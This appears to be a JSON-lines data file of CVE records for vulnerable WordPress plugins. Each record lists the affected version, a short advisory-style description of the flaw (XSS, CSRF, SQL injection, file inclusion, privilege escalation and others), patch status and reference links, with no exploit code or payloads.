{"CVE_ID":"CVE-2024-5808","slug":"wp-ajax-contact-form","versionImpact":"2.2.2","description":"The WP Ajax Contact Form WordPress plugin through 2.2.2 does not have CSRF check in place when deleting emails from the email list, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1783bbce-3cc3-4a7e-a491-b713cee8278b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1783bbce-3cc3-4a7e-a491-b713cee8278b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11457","slug":"feedpress-generator","versionImpact":"1.2.1","description":"The Feedpress Generator \u2013 External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedpress-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedpress-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9660aee-1069-4197-b166-12ea30f8fd0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9660aee-1069-4197-b166-12ea30f8fd0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9619","slug":"wp-shapes","versionImpact":"1.0.0","description":"The WP SHAPES plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-shapes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-shapes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8207ae15-b6ae-4b58-8877-1f87c12dbe7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8207ae15-b6ae-4b58-8877-1f87c12dbe7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9673","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.31","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Heading widget in all versions up to, and including, 2.4.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/extension-pafe-tooltip.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/extension-pafe-tooltip.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217875\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217875\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/317a0e93-fcd7-41a0-a83e-98c50bfc6be2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/317a0e93-fcd7-41a0-a83e-98c50bfc6be2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13628","slug":"wp-pricing-table","versionImpact":"1.1","description":"The WP Pricing Table WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d6c8a2-e70d-485c-a217-4a569c16b079\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d6c8a2-e70d-485c-a217-4a569c16b079\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2164","slug":"pixelstats","versionImpact":"0.8.2","description":"The pixelstats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post_id' and 'sortby' parameters in all versions up to, and including, 0.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L664\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L664\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixelstats\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixelstats\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8683bc00-1136-42c4-a256-84b2cac1d575?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8683bc00-1136-42c4-a256-84b2cac1d575?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32238","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.2","description":"Generation of Error Message Containing Sensitive Information vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita allows Retrieve Embedded Sensitive Data. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-2-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-2-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5238","slug":"yith-woocommerce-wishlist","versionImpact":"4.5.0","description":"The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/docs.yithemes.com\\\/yith-woocommerce-wishlist\\\/changelog\\\/changelog-free-version\\\/\",\"name\":\"https:\\\/\\\/docs.yithemes.com\\\/yith-woocommerce-wishlist\\\/changelog\\\/changelog-free-version\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yith-woocommerce-wishlist\\\/tags\\\/4.5.0\\\/assets\\\/js\\\/unminified\\\/jquery.yith-wcwl.js\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yith-woocommerce-wishlist\\\/tags\\\/4.5.0\\\/assets\\\/js\\\/unminified\\\/jquery.yith-wcwl.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310555\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310555\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yith-woocommerce-wishlist\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yith-woocommerce-wishlist\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4b0434-61ca-47b1-9119-7208283f916f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4b0434-61ca-47b1-9119-7208283f916f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6726","slug":"block-editor-gallery-slider","versionImpact":"1.1.1","description":"The Block Editor Gallery Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the classic_gallery_slider_options() function in all versions up to, and including, 1.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited post meta for arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/block-editor-gallery-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/block-editor-gallery-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770b0401-4d05-476e-a2b1-e9e9c920f5fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770b0401-4d05-476e-a2b1-e9e9c920f5fa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45808","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"SQL Injection vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0064","slug":"wens-responsive-column-layout-shortcodes","versionImpact":"2.3","description":"The eVision Responsive Column Layout Shortcodes WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97be5795-b5b8-40c7-80bf-7da95da7705a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97be5795-b5b8-40c7-80bf-7da95da7705a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1021","slug":"amr-ical-events-list","versionImpact":"6.6","description":"The amr ical events lists WordPress plugin through 6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91d04f96-11b2-46dc-860c-dc6c26360bf3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91d04f96-11b2-46dc-860c-dc6c26360bf3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4551","slug":"yotuwp-easy-youtube-embed","versionImpact":"1.3.13","description":"The Video Gallery \u2013 YouTube Playlist, Channel Gallery by YotuWP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.13 via the display function. This makes it possible for authenticated attackers, with contributor access and higher, to include and execute arbitrary php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c932-5955-4fce-a64d-3b5c5de95356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c932-5955-4fce-a64d-3b5c5de95356?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/inc\\\/views.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/inc\\\/views.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/File%20Inclusion\\\/#lfi-to-rce-via-php-pearcmd\",\"name\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/File%20Inclusion\\\/#lfi-to-rce-via-php-pearcmd\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6316","slug":"generate-pdf-using-contact-form-7","versionImpact":"4.0.6","description":"The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and missing file type validation in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52cce49b-49b3-49b0-9f18-4829f07a420f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52cce49b-49b3-49b0-9f18-4829f07a420f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L72\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5807","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not prevent high privilege users like administrators from uploading malicious PHP files, which could allow them to run arbitrary code on servers hosting their site, even in MultiSite configurations.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/badb16b5-8c06-4170-b605-ea7af8982c1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/badb16b5-8c06-4170-b605-ea7af8982c1f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11380","slug":"wp-mini-program","versionImpact":"1.4.5","description":"The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mini-program\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mini-program\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0b9499b-3017-46a6-80d5-104d203b77f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0b9499b-3017-46a6-80d5-104d203b77f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12296","slug":"apus-framework","versionImpact":"2.3","description":"The Apus Framework plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'import_page_options' function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dda2c437-8f41-480a-8816-2c07ab0eafa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dda2c437-8f41-480a-8816-2c07ab0eafa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13624","slug":"wpmovielibrary","versionImpact":"2.1.4.8","description":"The WPMovieLibrary WordPress plugin through 2.1.4.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c19b56cc-634f-420f-b6a0-9a10ad159049\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c19b56cc-634f-420f-b6a0-9a10ad159049\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2163","slug":"zoorum-comments","versionImpact":"0.9","description":"The Zoorum Comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9. This is due to missing or incorrect nonce validation on  the zoorum_set_options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zoorum-comments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zoorum-comments\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b58fb0f-c7ac-4ee6-84f1-ac14617a7c2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b58fb0f-c7ac-4ee6-84f1-ac14617a7c2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32218","slug":"posts-table-filterable","versionImpact":"1.0.4","description":"Missing Authorization vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-wordpress-posts-table-filterable-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-wordpress-posts-table-filterable-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4667","slug":"simply-schedule-appointments","versionImpact":"1.6.8.30","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ssa_admin_upcoming_appointments, ssa_admin_upcoming_appointments, and ssa_past_appointments shortcodes in all versions up to, and including, 1.6.8.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L718\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L718\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306064\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.32\\\/includes\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306064\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.32\\\/includes\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-schedule-appointments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-schedule-appointments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/414173b9-d23e-4e44-bf8c-77a074bb09e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/414173b9-d23e-4e44-bf8c-77a074bb09e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6719","slug":"terms-descriptions","versionImpact":"3.4.8","description":"The Terms descriptions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/terms-descriptions\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/terms-descriptions\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a27b8d53-7229-4c88-9bda-5db31b0f8d92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a27b8d53-7229-4c88-9bda-5db31b0f8d92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8719","slug":"translate-this-google-translate-web-element-shortcode","versionImpact":"1.0","description":"The Translate This gTranslate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018base_lang\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/translate-this-google-translate-web-element-shortcode\\\/trunk\\\/translate_this_plugin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/translate-this-google-translate-web-element-shortcode\\\/trunk\\\/translate_this_plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/translate-this-google-translate-web-element-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/translate-this-google-translate-web-element-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f1a21c-2de0-4f41-b61e-7c4742900762?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f1a21c-2de0-4f41-b61e-7c4742900762?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0558","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to an unsecure token check that is susceptible to type juggling in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to execute functions intended for use by users with proper API keys.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L416\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c31828dc-ef94-4895-8395-a5d52a0a82bd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c31828dc-ef94-4895-8395-a5d52a0a82bd\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ti.wordfence.io\\\/vulnerabilities\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"name\":\"https:\\\/\\\/ti.wordfence.io\\\/vulnerabilities\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
